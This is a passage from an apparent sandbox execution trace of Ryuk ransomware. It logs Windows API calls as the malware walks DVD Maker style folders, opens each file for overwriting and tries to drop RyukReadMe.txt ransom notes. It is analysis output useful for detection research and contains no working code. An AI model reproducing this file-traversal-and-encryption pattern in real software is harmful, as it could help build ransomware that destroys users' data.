Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png", dwFileAttributes=0x80) returned 0 [0133.710] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\goldring.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.710] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.710] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.710] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.710] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.710] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png", dwFileAttributes=0x80) returned 0 [0133.710] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.710] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.710] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.711] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.711] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.711] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.711] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\navigationbuttonsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.711] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.711] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.711] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.711] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.711] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png", dwFileAttributes=0x80) returned 0 [0133.711] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\nextmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.711] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.712] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.712] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.712] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.712] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png", dwFileAttributes=0x80) returned 0 [0133.712] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\parentmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.713] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.713] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.713] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.713] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.713] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png", dwFileAttributes=0x80) returned 0 [0133.713] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\previousmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.713] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.713] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.713] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.713] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.714] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png", dwFileAttributes=0x80) returned 0 [0133.714] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.714] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.714] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.714] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.714] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.714] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png", dwFileAttributes=0x80) returned 0 [0133.714] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha2.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.714] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.714] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.714] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.715] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.715] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.715] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttonsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.715] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.715] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.716] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.716] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.716] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv", dwFileAttributes=0x80) returned 0 [0133.716] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.716] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.716] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.716] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.716] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.716] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.717] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.717] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.717] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.717] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.717] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.717] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv", dwFileAttributes=0x80) returned 0 [0133.717] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.717] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.717] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.717] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.717] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.718] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.718] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.718] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.718] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.719] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.719] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.719] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv", dwFileAttributes=0x80) returned 0 [0133.719] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.719] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.719] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.719] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.719] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.719] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.719] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.720] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.720] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.720] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.720] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.720] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv", dwFileAttributes=0x80) returned 0 [0133.720] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.720] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.720] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.721] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.721] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.721] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.722] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.722] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.722] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.722] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.722] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.722] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv", dwFileAttributes=0x80) returned 0 [0133.723] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.723] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.723] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.723] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.723] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.723] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.723] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.724] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.724] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.724] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.724] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.724] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png", dwFileAttributes=0x80) returned 0 [0133.724] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sports_disc_mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.724] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.724] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.725] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.725] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.725] SetLastError (dwErrCode=0x0) [0133.725] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.729] GetLastError () returned 0x5 [0133.729] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.729] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.729] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.729] SetLastError (dwErrCode=0x0) [0133.729] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.729] GetLastError () returned 0x5 [0133.729] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.729] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.729] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.731] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.731] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.731] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.732] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0133.732] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.732] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.732] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.732] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.732] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.732] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png", dwFileAttributes=0x80) returned 0 [0133.733] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\1047x576_91n92.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.733] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.733] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.733] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.733] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.733] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png", dwFileAttributes=0x80) returned 0 [0133.733] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.734] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.734] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.734] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.734] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.734] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png", dwFileAttributes=0x80) returned 0 [0133.735] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\720x480icongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.735] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.735] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.735] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.735] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.735] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png", dwFileAttributes=0x80) returned 0 [0133.736] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\720_480shadow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.736] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.736] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.736] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.736] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.736] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.736] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.737] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.737] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.737] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.737] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.737] SetFileAttributesW 